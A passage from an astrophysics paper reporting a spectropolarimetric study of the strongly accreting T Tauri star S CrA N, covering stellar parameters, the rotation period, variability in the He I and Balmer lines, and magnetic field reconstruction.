funnels, one per hemisphere, or unstable when several equatorial longues penetrate the stellar magnetosphere. These tongues are transient on timescales of the stellar rotation period and can coexist with stable accretion funnels (Kulkarni and Romanova 2008; Pantolmos et al. 2022). The transition between these regimes strongly depends on the mass accretion rate: unstable accretion is expected to be observed mostly in strong accretors rather than in low accretors (Blinova et al. 2016). Strong accretors allow us to probe a different accretion regime, through which all low-mass stars should go during their early pre-main sequence (PMS) evolution as they move away from the protostellar phase (Baraffe et al. 2017). Yet, they have been poorly explored until now, because their variability in the optical domain complicates their spectral analysis. Until recently, the structure of the magnetosphere has been mostly probed through indirect observations thanks to the measurements of magnetic field strength and topology (Donati et al. 1997), and mass accretion rate estimates (Manara et al. 2021; Alcala et al. 2021). The drastic improvement of sensitivity of optical long-baseline interferometers has opened a new promising way to probe the interaction between the young stars and their inner disks. The K-band interferometric beam-combiner GRAVITY at the VLTI (GRAVITY Collaboration et al. 2017a) makes it possible to spatially resolve the Br \(\gamma\) line emitting region for a few T Tauri stars (Gravity Collaboration et al. 2023). Combined with spectropolarimetry, this appears very promising as it allows comparing the size of the Br \(\gamma\) line emitting region with that of the magnetosphere derived by spectropolarimetry, and thus to investigate the accretion-ejection processes at (sub-)astronomical unit scale (Bouvier et al. 2020; Gravity Collaboration et al. 2020, 2023). With the aim of studying the peculiar accretion regime of a strong accretor through complementary observing techniques, we focus our work on the North component of the young binary system S Coronae Australis (S CrA N) as it is one of the strongest accretors of the GRAVITY T Tauri sample (\(M\sim 10^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\); Gahm et al. 2018 ; Sullivan et al. 2019). To complete the GRAVITY data set and better understand the accretion-ejection phenomena at play, we have conducted an observing campaign with the optical spectropolarimeter ESPaDOnS. S CrA is a T Tauri binary system whose components are coeval (Gahm et al. 2018 and references therein) and separated by about 1.4" (Reipurth and Zinnecker 1993). Due to the inverse P Cygni profiles of its hydrogen Hy and H\(\delta\) lines, Rydgren (1977) classified this system as a YY Ori object, a sub-class of PMS stars characterized by their excess in the Ultra-Violet (UV) and the inverse P Cygni structure in the high orders of the Balmer series (Walker 1972). Many spectroscopic studies in the optical and near-infrared ranges of S CrA have been reported in the literature and focused on characterizing its veiling (Prato et al. 2003), its variability (Edwards 1979; Sullivan et al. 2019), and more generally on the accretion-ejection processes at play (Gahm et al. 2018). From these spectral analyses, S CrA N appears to be highly obscured by a variable veiling and to exhibit a high mass accretion rate onto the star, suggesting that this star might be transitioning between the Class I and Class II stages of stellar evolution. S CrA has been part of the ALMA survey of protoplanetary disks in the Corona Australis region (Cazzoletti et al. 2019); a continuum emission at 1.3 mm with a half-width of half-maximum of about 0.22\({}^{\circ}\) is detected around S CrA N; it exhibits neither clear substructures nor an inner cavity with radii larger than 25 au. S CrA N has also been observed in the mid-infrared range with the MIDI instrument of the VLTI (Schegerer et al. 2009; Varga et al. 2018): a half-flux radius of the continuum emitting region of about 1.4 au was derived, but the observations did not allow to accurately constrain the disk properties. More recently, the near-infrared continuum emission of S CrA N has been partially resolved in the H-band with PIONIER (Anthonioz et al. 2015) and in the K-band with GRAVITY (GRAVITY Collaboration et al. 2017b, 2021), and a half-flux radius of about 0.1 au has been derived for this continuum emission. Moreover, by fitting the continuum K-band interferometric data obtained with GRAVITY, GRAVITY Collaboration et al. (2021) derived an inclination of the inner disk of 27 \({}^{\circ}\pm 3^{\circ}\). Thanks to the spectrometric capabilities of GRAVITY, the Br\(\gamma\) emitting region close to the star has also been partially resolved (0.06-0.07 au), appearing more compact than the continuum (GRAVITY Collaboration et al. 2017b; Gravity Collaboration et al. 2023). In this paper, we report on the spectropolarimetric campaign we led on S CrA N in the optical range to complete the GRAVITY near-infrared interferometric study of Gravity Collaboration et al. (2023). The observations and the data processing are described in Section 2. We present our results in Section 3 and discuss them in Section 4. ## 2 Data ### Observations S CrA N was observed with ESPaDOnS (Donati 2003), the spectropolarimeter at Canada France Hawaii Telescope (CFHT), for 11 consecutive nights from the 21\({}^{\rm st}\) of June to the 2\({}^{\rm nd}\) of July 2018, plus one last observation on the 4\({}^{\rm th}\) of July. Altogether, \begin{table} \begin{tabular}{l c c c c c} \hline \hline Date & HJD & \(t_{\rm exp}\) & SNR(I) & SNR(V) & Seeing \\ (2018) & (-2458000) & (s) & & & (arcsec) \\ \hline June 21 & 290.96670 & 3562 & 159 & 121 & 0.43 \\ June 22 & 291.97893 & 3600 & 90 & 68 & 0.81 \\ June 23 & 292.95395 & 3600 & 118 & 93 & 0.58 \\ June 24 & 293.99200 & 3600 & 117 & 88 & 0.63 \\ June 25 & 294.93505 & 3600 & 124 & 94 & 0.52 \\ June 26 & 295.97417 & 3448 & 156 & 116 & 1.30 \\ June 27 & 296.94506 & 3600 & 114 & 84 & 1.35 \\ June 28 & 297.91663 & 3600 & 121 & 88 & 1.05 \\ June 29 & 298.94801 & 3600 & 115 & 86 & 0.50 \\ June 30 & 299.95373 & 3600 & 117 & 86 & 0.60 \\ July 01 & 300.90393 & 3600 & 114 & 80 & 0.62 \\ July 04 & 303.93473 & 3600 & 100 & 67 & 0.57 \\ \hline \end{tabular} \end{table} Table 1: Log of the ESPaDOnS observations of S CrA N including the Date of observation, Heliocentric Julian Date (HJD), total exposure time (\(t_{\rm exp}\)), Signal to Noise Ratios (SNR) as the average value computed in the order centered on 581 nm, and seeing as measured by the Mauna Kea Atmospheric Monitor (MKAM) at the time of observation. they represent a set of 12 observations over a spectral range from 367 nm to 1048 nm, with a spectral resolution \(R\sim 65\,000\). The log of the observations is given in Table 1. Each observation consists of Stokes \(I\), \(V\), and null (\(N\)) spectra per Heliocentric Julian Date (HJD). The Stokes \(I\) parameter represents the total intensity of the light and allows for a classical spectroscopic analysis at a very high resolution. The Stokes \(V\) parameter is the difference between left and right circularly polarized light, which provides the observer with information on the line-of-sight component of the magnetic field in the region where the light comes from. The \(N\) signal is computed in a way that cancels the polarization of the incoming light. It is used to check for spurious polarization signals in the Stokes \(V\) data: any detection in Stokes \(V\) tallying with a \(N\) signal significantly above its Root Mean Square (RMS) noise should be considered spurious. Since the separation between S CrA N and S CrA S is 1.4" while the average seeing at CFHT was 750 mas during our observations, we made sure that the contribution of S CrA S to the total observed flux was negligible (see Appendix A for the complete treatment). In the end, the average contribution of S CrA S is as low as 1.7%, with 3 observations exceeding a contribution of 5% : June 26, 27 and 28 with 9.0%, 9.3% and 5.3%, respectively. We considered these contributions negligible for the rest of the study but stayed vigilant to any unexpected behaviour that would come out from any of these three observations. ### Data reduction The data were reduced automatically through the Libre ESpRTI procedure (see Donati et al. 1997). This reduction also includes the normalization of the Stokes \(I\) continuum, which was imperfect in the case of S CrA N due to the high activity of the object. The numerous intense emission lines led to a biased estimation of the continuum level in some spectral windows. We used the SpeNT code developed by Martin et al. (2018) to refine the normalization of our spectra until the continuum level varied by no more than the RMS signal outside any line in Stokes \(I\). The code fits a third order spline to the continuum considering a \(\sigma\)-clipping procedure to automatically reject absorption/emission lines. Nevertheless, this procedure can be manually adjusted by visually rejecting any fixed point of the spline should the considered portion of the spectrum be highly variable. For S CrA N, we performed the fit on the average spectrum of all the Stokes \(I\) spectra in our sample. Then, the resulting normalization was applied to all the spectra. This procedure proved to be essential to obtain good normalized spectra for S CrA N. We recovered 12 good-quality spectra (one per night) displaying the usual telluric lines, photospheric lines, and classical emission lines for CTTS, as previously reported for this object (Gahm et al. 2018). We present a portion of the spectra in Fig. 1 where all these different features are visible at the same time. Photospheric lines are present but appear very weak on average (about 5% of the continuum level) due to veiling over the whole range of observation. The emission lines are particularly intense on average, with variable shapes (e.g. the iron lines on the left of Fig. 1). Many of the observed emission lines sensitive to the magnetic field exhibit significant Stokes \(V\) counterparts, suggesting a strong magnetic field (these lines are presented in Appendix B). Finally, the telluric lines were not removed since no line of interest was located inside a telluric region. ### Least Square Deconvolution One convenient way to look at these data is to compute their Least Square Deconvolution (LSD) profiles in both Stokes \(I\) and Stokes \(V\) spectra (Donati et al. 1997): the photospheric absorption lines and their Stokes \(V\) counterpart are weighted by their central wavelength, depth and Lande factor; then these weighted lines are averaged altogether over one observation. We built a mask that identifies the lines to include in this computation using the VALLD database1(Piskunov et al. 1995; Ryabchikova et al. 2015): by scanning the average spectrum over-plotted to a synthetic spectrum produced with the MARCS stellar atmosphere model (Gustafsson et al. 2008), we searched for undisturbed photospheric lines to be included. We paid particular attention not to include absorption lines contaminated by emission or telluric lines. Usually, the LSD \(I\) profiles obtained exhibit distortions that are attributable to spots located at the photosphere level. In the case of LSD \(V\), these profiles are shaped by the magnetic field along the line of sight at the surface of the star. The weak field approximation assumes that the broadening of the photospheric profiles due to the Zeeman effect (proportional to the local magnetic intensity along with the Lande factor and the central wavelength of a line) is negligible compared to all the other sources of broadening (instrumental broadening, thermal Doppler broadening, non-thermal Doppler broadening, microturbulent and macroturbulent velocities dispersions). Combined in quadratic sum, these effects correspond to a broadening of \(\Delta v_{\rm tot}~{}=~{}16.58\) km/s. For the specific case of S CrA N observed with ESPaDOnS, this \(\Delta v_{\rm tot}\) translates into \(B\ll 10\) kG. In other words, the use of the LSD profiles is justified under the condition that the surface averaged magnetic field does not reach 10 kG or more. Footnote 1: VALD database : [http://vald.astro.uu.se/](http://vald.astro.uu.se/) After applying the LSD computation with a Lande factor of 1.2 and a central wavelength of 500 nm to the complete Stokes \(I\) and \(V\) spectra, we obtain 12 set of LSD \(I\), LSD \(V\) and LSD \(N\) profiles (Fig. 2): one profile represents one observation date, which will be mentioned as (HJD - 2458000) hereafter (see Table 1), for convenience. We report that the LSD \(N\) profiles show no spurious signal at any velocity for any observation. Figure 1: Portion of all the normalised spectra. Each color stands for one observation. The same color code will be used for the rest of the study. ## 3 Results In this section, we present the methods used for the analysis of the set of data introduced above, and present our results. ### Fit of the Stokes \(I\) spectra We used the ZEEMAN code (Landstreet, 1988; Wade et al., 2001; Folsom et al., 2018) to derive the stellar parameters of S CrA N from the fitting of photospheric lines in our spectra. The ZEEMAN code solves the radiative transfer assuming Local Thermodynamic Equilibrium (LTE) in a 1D stellar atmosphere. We used the MARCS stellar atmosphere model and the theoretical properties of the photospheric lines are extracted from the VALD database as mentioned in Sect. 2.3. Then, the procedure for ZEEMAN is to adjust a synthetic spectrum to an observed one by minimizing a \(\chi^{2}\) function taking into account its seven free parameters, which are the effective temperature \(T_{\rm eff}\), the equatorial rotation velocity of the star projected on the line of sight \(v\sin i\), the radial velocity \(v_{r}\), the local veiling \(r\) taken to be an excess continuum flux as a fraction of continuum, the surface gravity \(\log g\), the micro-turbulent velocity \(v_{\rm mic}\), and the macro-turbulent velocity \(v_{\rm mac}\). A 7D \(\chi^{2}\) map being likely to display several local minima, we adjusted the parameters by pairs: \(T_{\rm eff}\) along with \(r\), then \(v\sin i\) along with \(v_{r}\), then \(v_{\rm mic}\) along with \(v_{\rm mac}\), \(\log g\) being adjusted on its own. At first, all constant parameters were set to an arbitrary value until a minimum \(\chi^{2}\) was reached for a considered pair of parameters. Then, the two previously fitted quantities were set constant to their new value, before fitting two new parameters until reaching a new minimum \(\chi^{2}\), which gives two different constant values to the new couple of parameters, and so on until we fitted all parameters. Then, the procedure is repeated until a whole cycle of fitting produces no variation in any of the parameters. We tested the sensitivity to initial conditions by setting different starting values for each parameter, but the procedure always converged to the same set of values, except for \(\log g\) and \(v_{\rm mic}\). Their values did not change, regardless of the number of cycles performed, which shows little sensitivity of our fit to these parameters. For the procedure to run, we fixed \(\log g=4.0\), which is common for CTTS, and derived the mass and radius as described in Sect. 4. Concerning \(v_{\rm mic}\), we retained a value of 1 km/s minimizing the \(\chi^{2}\) function for the procedure to run, but did not derive any uncertainties based on the \(\chi^{2}\) function. This fitting is done over 15 spectral windows (the central wavelength of which are mentioned in Fig. 3) that display clear photospheric lines (i.e., deeper than 10% of the continuum level). All our results are gathered on the first four rows of Table 2. Each value corresponds to the average of the values over the 15 spectral windows, and the uncertainty corresponds to their standard deviation. We obtained an effective temperature of (\(T_{\rm eff}=4300\pm~{}100\) K). We retrieved a rotational velocity of \(v\sin i=10\pm 2\) km/s, where \(i~{}=~{}0^{\circ}\) corresponds to a face-on object. We obtained a radial velocity of \(v_{r}=0\pm 1\) km/s, and a macroscopic turbulence velocity \(v_{\rm mac}=11\pm 3\) km/s. When plotting the veiling values against the spectral windows in which it is measured, no clear trend is observed unlike in most CTTS where veiling decreases with wavelength in the optical domain (see e.g. Fischer et al., 2011). When plotting the veiling as a function of time for different spectral windows (Fig. 3), no clear periodicity can be identified, suggesting that an additional source must be at play, on top of the continuum emission from an accretion spot (e.g. accretion-powered emission lines). The mean veiling \(r\) over the 15 spectral windows and over time is as high as 7 on average, and ranges between 4 and 11. ### Variability in LSD profiles The LSD \(I\) profiles presented in Fig. 2 show strong variability in intensity, which is unsurprising due to changes in veiling inten Figure 3: Evolution of the average optical veiling with time. For each date, each color point stands for the mean veiling over one spectral window whose center value is indicated in the caption. The error bars are centered on the average of the values computed over the 15 spectral windows and spread over their standard deviation. Figure 2: LSD \(I\) and \(V\) profiles of S CrA N sorted by HJD (HD) - 2458000 mentioned on the right of each plot) normalized by the maximum EW, observed at date 303.93. The color coding is the same as in Fig. 1. The spacing between two profiles stands for the time span between the observations. Each profile is represented with a solid colored line and is surrounded by its uncertainties in faded color. Black dotted lines represent the reference Voigt profile for the \(I\) profiles and the continuum for the \(V\) profiles. Dashed vertical lines represent the radial velocity of the star. \(V\) profiles are magnified by a factor 5 for clarity. sity. Indeed, we found a negative correlation between the mean veiling and the equivalent width (EW) of the LSD \(I\) profile at each date. Thus, both LSD \(I\) and \(V\) profiles were scaled to the greatest EW (occurring at the Julian date 2,458,303.93) so they all had the same EW. By doing so, one retains only their intrinsic shape variability presumably due to spots. The shape of the LSD \(I\) profiles changes entirely from one date to the following (Fig. 2). From date 291.98 to 292.95, for instance, the minimum intensity switches from the red to the blue side of the profile, and the small excess observed in the blue wing at first becomes reddened at 292.95. Then at date 303.93, the profile looks just like the one at 291.98 again, with only minor changes in intensity. To try and constrain the origin of this variability, we checked whether the LSD \(I\) profiles were deformed differently, depending on the intrinsic depth of the lines included in the LSD mask (see Appendix B for the detailed procedure). It results that no matter the depth limit of the lines taken into account for the LSD computation, the shapes of the profiles remain the same, with just a loss in signal-to-noise ratio (SNR) when removing more lines. We could not find a way to compute LSD \(I\) profiles with attenuated perturbations, and therefore adopted the LSD mask that gives the best SNR in the line profiles. The source of these distortions must break the spherical symmetry of the surface of the star, and considering the high variability of our LSD \(I\) profiles, we cannot interpret them as deviations from a rest profile. Hence, we compared the LSD \(I\) profiles to a synthetic Voigt profile. We adjusted this profile by fitting it to the median LSD \(I\) observed within a velocity range of [-25 km/s; +25 km/s]. This reference profile is shown as a dotted line over the LSD \(I\) profiles in Fig. 2. When looking at the \(V\) profiles, they also exhibit a variety of shapes, from flat (date 303.93) to typically anti-symmetric (e.g. at date 292.95). We also note that similar \(I\) profiles can display very different \(V\) profiles. That is the case for profiles at dates 293.99 and 303.93, where the \(I\) profiles are very similar, but the \(V\) profiles are respectively strong and flat. Conversely, at dates 291.98, 292.95, and 293.99, the \(V\) profiles remain constant in intensity over those 3 observations, with just a smooth drift of the centroid from negative to positive velocities. In contrast, the \(I\) profiles are drastically different. There is no evident correlation between the \(I\) and \(V\) variations, suggesting that brightness inhomogeneities at the surface of S CrA N might have additional sources besides brightness spots induced by the magnetic activity. To recover the stellar rotation period, we computed 2D periodograms for the LSD \(I\) and \(V\) profiles (Fig. 4). We ran a Lomb-Scargle periodogram routine over each velocity channel (i.e., wavelength) to build the periodograms, where a time series of 12 unevenly sampled observations were considered. We restrained the search for periods larger than 2 days (Shannon theorem applied to a 1 day sampling, which is the smallest sampling of our data) and smaller than 14 days. Any periodicity above -or near- 14 days cannot be considered reliable since that was the total span of our observations. False Alarm Probability (FAP) contours of 3% are drawn in Fig. 4. All the FAPs of this study were computed assuming white noise in the continuum, i.e. independent measurements, following the method described in Zechmeister & Kurster (2009). The 2D periodograms reveal no apparent periodicity in the LSD \(I\) profiles. While these profiles might be influenced by stochastic activity in the post-shock region (see, e.g. Petrov et al. 2011; Dodin & Lamzin 2012; Rei et al. 2018), which could explain the deformations observed and hide periodic features from hot/cool surface spots, the LSD \(V\) profiles are more robust to such a contamination since the intensity of the magnetic field decreases rapidly with distance to the stellar surface (\(\propto r^{-3}\) at least, for a pure dipole). While the LSD \(I\) profiles display no clear periodicity, we can compute, for each line of the LSD \(V\) periodogram, the 2D periodogram's powers weighted by a 1-FAP factor over a range of velocity narrowed to the region of variability of the profiles (i.e., [-20 km/s; +20 km/s]). We are left with a 1D weighted periodogram whose peak's maximum is the stellar rotation period and whose standard deviation is the uncertainty. That yields a period of \(7.6\pm 1.3\) days located at the extrema of the \(V\) profile, where the amplitude variation is the most important, strengthening the reliability of this signal detection. \begin{table} \begin{tabular}{l c c l l} \hline \hline Parameter & This work & Literature & Method in the literature & Our method (if different) \\ \hline \(T_{\rm eff}\)\([K]\) & \(4300\pm 100\) & \(4250\) & Fit of photospheric lines\({}^{a}\) & Fit of photospheric lines \\ & & \(4800\pm 400\) & Comparison to spectral type standard star\({}^{b}\) & Fit of photospheric lines \\ & & & & \\ \(v\) sin \(i\)\([km/s]\) & \(10\pm 2\) & \(12\) & Fit of photospheric lines\({}^{a}\) & \\ & & & & \\ \(r\) & \([4-11]\) & \(8.3\) & Fit of photospheric lines\({}^{a}\) & \\ & & \(0\pm 1\) & \(0.9\pm 2.5\) & Fit of photospheric lines\({}^{a}\) & \\ & & & \(129\) & \(uvby,\beta\) photometry\({}^{c}\) & \\ & & & \(138\pm 16\) & Light echoes analysis\({}^{d}\) & ”On-cloud” sub-region distance\({}^{e}\) \\ & & & & \\ \(L_{*}\)\([L_{\odot}]\) & \(1.67\pm 0.8\) & \(2.29^{+0.76}_{-0.65}\) & Fit of SED\({}^{b}\) & Distance-corrected value\({}^{b}\). \\ & & & & \\ \(M_{*}\)\([M_{\odot}]\) & \(0.8\pm 0.1\) & \(0.7^{f}\) & From \(T_{\rm eff}\) assuming an age of 2 Myr & Position in HR diagram \\ & & & & Position in HR diagram \\ & & & & \\ \(P_{*}\) [days] & \(7.3\pm 0.2\) & \(4.2\pm 1\) & Periodicity in the He I narrow component\({}^{d}\) & \\ & & & & Direct computation \\ \hline \end{tabular} 1 \end{table} Table 2: Stellar parameters of S CrA N. ### Variability in emission lines CTTS are known to show strong and broad Balmer emission lines, as well as a narrow emission in He I lines. They are all often associated with red-shifted absorption features, indicating infall of material (Edwards et al., 1994; Beristain et al., 2001). It is now well accepted that a good part of these lines are formed through magnetospheric accretion (Hartmann et al., 1994, 2016). In our spectra, the Balmer and He I lines show various features, both in emission and absorption, as well as strong variability. We therefore report below our analysis on this variability to understand the origin of formation of these lines, and how they can constrain the magnetospheric accretion processes in a strongly accreting T Tauri star as S CrA N. #### Helium I \(\lambda\)5876. This line can be composite with up to 3 distinct components, which are particularly discernible in the case of S CrA N (Fig. 5-top): * A narrow component (NC) which is asymmetric and goes from -30 km/s to 50 km/s and peaks around 0 km/s. Due to its very high excitation potential, this emission line is believed to trace accretion footprints at the surface of the star. * A broad component (BC), as wide as \(\pm\) 250 km/s and well reproduced by a Gaussian fit. Its origin is still poorly constrained, but might itself be composite. * An absorption component (AC) in the red wing of the broad component (between \(\sim\) 200 and \(\sim\) 350 km/s). Strong Zeeman signatures are present in Stokes V spectra (Fig. 5-bottom). The S-shaped signature spreads from -30 km/s to +50 km/s on average and is as strong as 20% of the continuum intensity. Due to its broadening and asymmetric shape, this \(V\) signal is attributed to the NC and thus traces the magnetic field at the footprint of the accretion columns. In order to study all the components separately, a fit with 3 independent Gaussian profiles was applied to each observed I profile. Each component is extracted by removing the models of the two other components from the profiles: the BC and AC Gaussian models were subtracted to the whole line as they did match the shape and intensity of the observed BC and AC at all phases. On the contrary, due to the intrinsic asymmetry of the NC, removing its Gaussian model left significant NC residuals in the extracted BC and AC profiles. Instead, a smoothed NC was subtracted from the original total profile, along with the AC/BC Gaussian model. This smoothed NC was obtained using a three-point moving average of the extracted NC. We performed radial velocity, equivalent width and longitudinal field measurements in the NC. The longitudinal field is obtained thanks to the first moment method (Donati et al., 1997; Wade et al., 2000) The equivalent width is computed between -30 km/s and +50 km/s. Finally, we measured the radial velocity of the NC's centroid by computing the first moment of the profile at each date. All three quantities are presented in Table 3 and Fig. 6. The radial velocity modulation was used to estimate the stellar period thanks to a point-like accretion spot model described in further detail in Pouilly et al. (2021). We obtained a period \(P=7.3\pm 0.2\) days. The 2D periodograms were computed for \(V\) profiles and all three Stokes \(I\) components (Fig. 7). Each emitting component displays its own periodicity. The center of the NC shows a \(7.4\pm 1.4\) days period with strong significance (FAP \(<\) 3%). However, this period drifts down to 6.6 \(\pm\) 1.3 days in the red wing (above +30 km/s). The BC shows a 3.2 \(\pm\) 0.3 days period with a much lower significance (FAP \(\sim\) 15%), whereas there is no signal at 7.4 days. The high power signal at long periods cannot be considered significant since it could not be observed for a full cycle, and the white noise assumption in the FAP computations tends to overestimate its significance level. The AC displays a 6.6 \(\pm\) 1.3 days period from 0 to +200 km/s, and a 3.4 \(\pm\) 0.4 days period beyond +200 km/s. Both periods are detected with a high significance level (FAP \(<\) 3%). All the derived periods are gathered and compared in Fig. 8, and will be discussed in Sec. 4. a persistent blue-shifted absorption is present at all phases (peaking at about -100 km/s). On top of this absorption, a narrow emission can be observed in H\(\delta\) and H\(\gamma\), along with a red-shifted absorption spreading from +50 to +300 km/s. A similar red-shifted absorption is barely detected in H\(\beta\) and cannot be seen in H\(\alpha\), although its underlying presence could explain the asymmetry of the far wings in the latter. The exact span of this absorption is not the same for all the lines though. The complexity of the Balmer lines can be interpreted as a multi-component origin of the hydrogen emission, coming from different phenomena and/or different locations in the inner disk and magnetospheric regions, which will be discussed in Section 4. ### Correlations in spectral lines We computed correlation matrices based on the Pearson coefficients to highlight different behaviours within a line profile and/or to link different lines between them (see e.g. : Kurosawa et al., 2005; Pouilly et al., 2020). More explicitly, for two given lines, one can compute the correlation between each pixel (i.e., velocity channel or wavelength) of the first line and each pixel of the second line, thanks to the time series of these lines. Given a pixel \(i\) in the first line and a pixel \(j\) in the second line, the correlation coefficient \(R_{ij}\) between these pixels is given by: \[R_{ij}=\frac{C_{ij}}{\sqrt{C_{ii}C_{jj}}} \tag{1}\] with \(C_{ij}\) the covariance between \(i\) and \(j\) : \[C_{ij}=\frac{1}{N-1}\sum_{k=1}^{N}\left(F_{i,k}-\overline{F_{i}}\right)\left( F_{j,k}-\overline{F_{j}}\right) \tag{2}\] where \(N\) is the number of observations (12 here), \(F_{i,k}\) is the flux in pixel \(i\) for observation \(k\), and \(\overline{F_{i}}\) is the mean flux in pixel \(i\) over the \(N\) observations. The coefficients of \(R_{ij}\) hence range from -1 (perfect anti-correlation) to +1 (perfect correlation), with a null value meaning no correlation. To define some value above which we would consider a correlation level as significant, we computed 1 billion samples where two random variables were taken 12 times (one for each observation) in a white noise equivalent to our Stokes \(I\) RMS = 0.05. This gives a Gaussian distribution of \(R_{ij}\) centered on 0 and with \(\sigma=0.38\). We chose to take a 2\(\sigma\) level of significance, corresponding to \(|R_{ij}|\geq 0.76\) for significant correlation, while \(0.38\leq|R_{ij}|\leq 0.76\) will correspond to a moderate correlation, and \(|R_{ij}|\leq 0.38\) to low correlation. ### Correlations in He I. The decomposition of the Helium line into BC and NC components is well justified by the auto-correlation matrix of the whole line (Fig. 10-top-left). These components are neither correlated nor anti-correlated. Hence, their origin is linked to different processes. When checking for the correlations between each component and the Stokes \(V\) signature, the NC is well correlated with the positive peak of the \(V\) profile, while anti-correlated with the negative peak. The BC displays no clear correlation with any part of the \(V\) profile, confirming that the \(V\) signal is produced by the magnetic field in the region of formation of the NC, and is unrelated with the BC formation. \begin{table} \begin{tabular}{c c c c} \hline \hline Phase & Radial vel. & Equ. width & Long. field \\ (\(\pm\) 0.03) & (km.s\({}^{-1}\)) & (km.s\({}^{-1}\)) & (KG) \\ \hline \hline 0.00 & 1.373 \(\pm\) 0.003 & 41 \(\pm\) 1 & 1.17 \(\pm\) 0.03 \\ 0.14 & 2.35 \(\pm\) 0.04 & 54 \(\pm\) 2 & 1.30 \(\pm\) 0.05 \\ 0.27 & 2.54 \(\pm\) 0.03 & 74 \(\pm\) 2 & 1.68 \(\pm\) 0.04 \\ 0.41 & 2.37 \(\pm\) 0.03 & 66 \(\pm\) 2 & 1.31 \(\pm\) 0.03 \\ 0.54 & 2.40 \(\pm\) 0.03 & 63 \(\pm\) 2 & 1.12 \(\pm\) 0.03 \\ 0.69 & 1.80 \(\pm\) 0.02 & 42 \(\pm\) 1 & 1.08 \(\pm\) 0.03 \\ 0.82 & 0.99 \(\pm\) 0.01 & 44 \(\pm\) 2 & 0.84 \(\pm\) 0.03 \\ 0.95 & 0.88 \(\pm\) 0.01 & 46 \(\pm\) 2 & 1.37 \(\pm\) 0.05 \\ 1.09 & 1.96 \(\pm\) 0.04 & 50 \(\pm\) 2 & 1.33 \(\pm\) 0.04 \\ 1.23 & 2.27 \(\pm\) 0.04 & 48 \(\pm\) 2 & 1.32 \(\pm\) 0.04 \\ 1.36 & 2.80 \(\pm\) 0.02 & 93 \(\pm\) 2 & 1.08 \(\pm\) 0.02 \\ 1.78 & 1.91 \(\pm\) 0.03 & 43 \(\pm\) 2 & 1.01 \(\pm\) 0.05 \\ \hline \end{tabular} \end{table} Table 3: Radial velocities, equivalent width and longitudinal field derived for each phase in the He I NC. Figure 6: Radial velocities (top), equivalent width (middle), and longitudinal magnetic field (bottom) of the He I NC as a function of the stellar phase, when considering a stellar rotation period of \(7.3\pm 0.2\) days and considering the first date of observation as \(\phi=0\). When not visible, uncertainties are smaller than the symbol. Dotted black lines illustrate the best fits obtained, with a simple sine (middle and bottom) and the model of Pouilly et al. (2021) (top). The color code is the same as in Fig. 1. ### Correlations in \(H\alpha\). Fig. 10-bottom-left shows the auto-correlation matrix of the H\(\alpha\) line. Two main components can be identified: a main broad symmetric emission (from -400 to 400 km/s), truncated by a strong absorption from -200 to 0 km/s. It should be noted that this blue-shifted absorption is actually twofold: a saturated part spreads between -200 and -100 km/s, and a variable one between -100 and 0 km/s. This variable component is moderately anti-correlated (\(R_{ij}<-0.38\)) with the broad emission. ### Cross-correlations between He I and \(H\alpha\). All the correlations found between the H\(\alpha\) and the He I lines are moderate compared to the ones found for the previously mentioned auto-correlations matrices. Still, hints for possible correlation are visible and presented here. Fig. 10-bottom-middle shows that the He I NC seems correlated with the saturated part of the blue-shifted absorption in the H\(\alpha\) line, even though the correlation coefficient does not reach the 2\(\sigma\) significance level. This partial correlation is confirmed when inspecting Fig. 10-bottom-right. Indeed, the \(V\) profile exhibits the same correlation pattern with both the variable part in the blue-shifted absorption of H\(\alpha\) and the He I NC (see Fig. 10-top-middle). A moderate anti-correlation (\(R_{ij}\sim-0.38\)) is found between the variable blue-shifted absorption of H\(\alpha\) and the He I BC. However, considering the previous results, a negative correlation between the He I V profile and the He I BC should be found (Fig. 10-top-right), which is not the case. Either there is no correlation between these components, or the underlying correlation is being quenched due to a potential cross-talk. Such a moderate correlation can also be found between the whole blue-shifted absorption of H\(\alpha\) and the He I AC, with \(R_{ij}\sim 0.38\) (green light area at the top of Fig. 10-bottom-middle). Only this time, we do not have other diagnoses to confirm this correlation. ### Magnetic field reconstruction The Zeeman Doppler Imaging (ZDI) technique uses the rotational modulation of Stokes \(V\) profiles to infer the large-scale magnetic configuration. We use the 2DTyp code which assumes a decomposition of the field in spherical harmonics and adopts a weak-field approximation to reconstruct it's topology, as described in full details in Folsom et al. (2018). ZDIpy applies a regularized fitting algorithm that simultaneously maximizes the entropy of the reconstructed topology while keeping the corresponding \(\chi^{2}\) below some target value (Skilling and Bryan, 1984). The obtained map is therefore interpreted as the minimal information map fitting the observed LSD \(V\) data with a goodness determined by the target \(\chi^{2}\). The ZDI procedure described above usually also fits Stokes \(I\) profiles to reconstruct the brightness distribution of the star. Figure 8: Comparison of all the periods derived in this study, gathered according to what profile gave them. Red dashed vertical lines illustrate the stellar rotation period (\(P_{*}\)) and half its value, surrounded by their uncertainty (light blue shade). All values are estimated from 2D periodograms except for (a), which is derived from radial velocities, and is chosen as \(P_{*}\). Figure 7: 2D Periodograms of the Stokes \(I\) NC (upper-left), BC (lower-left), AC (lower-right), and Stokes \(V\) (upper-right) in He I \(\lambda\)5876. The red dashed lines mark a period of 7.4 days (NC and Stokes \(V\)), 3.2 days (BC and AC), and 6.6 days (AC). The black dashed contours denote a constant FAP of 3% (except 15% for the BC). Below the periodograms are shown the average profiles (black line) surrounded by their 1-\(\sigma\) deviations (light blue). Figure 9: Balmer series in S CrA N. The color code is the same as Fig. 2. The vertical dotted line shows the stellar radial velocity, while the horizontal dotted lines show the continuum level for each line. The y-scale of H\(\alpha\) has been changed, for clarity. However, for S CrA N, we never reached a satisfying fit for the LSD \(I\). That is why a uniform brightness was assumed. This uniform brightness was obtained with a Voigt model fitting the observed median shape of LSD \(I\) (see Fig. 2). In order to reconstruct the magnetic maps, one needs to know the stellar rotation period and inclination with respect to the line of sight. From the variability analysis of the He I line, we adopt a stellar period \(P_{*}=7.3\pm 0.2\) days (see Table 2). Combining this stellar period with \(v\sin i\), and a radius estimate presented in Section 4, we derive the star's inclination \(i=39^{\circ}\pm 16^{\circ}\), which is in agreement at a 1-\(\sigma\) level with the inclination of the inner disk as determined by GRAVITY Collaboration et al. (2021) (27 \({}^{\circ}\pm 3^{\circ}\)). Considering the propagation of uncertainties in the computation of our stellar inclination, we adopt hereafter the value from GRAVITY Collaboration et al. (2021) as the inclination of the star: \(i=27^{\circ}\pm 3^{\circ}\). The ZDI procedure ran over 16 iterations to maximize entropy reaching the target reduced \(\chi^{2}\) of 1.5. This value represents the smallest target we could reach without fitting the noise of the data. The spherical harmonics expansion was 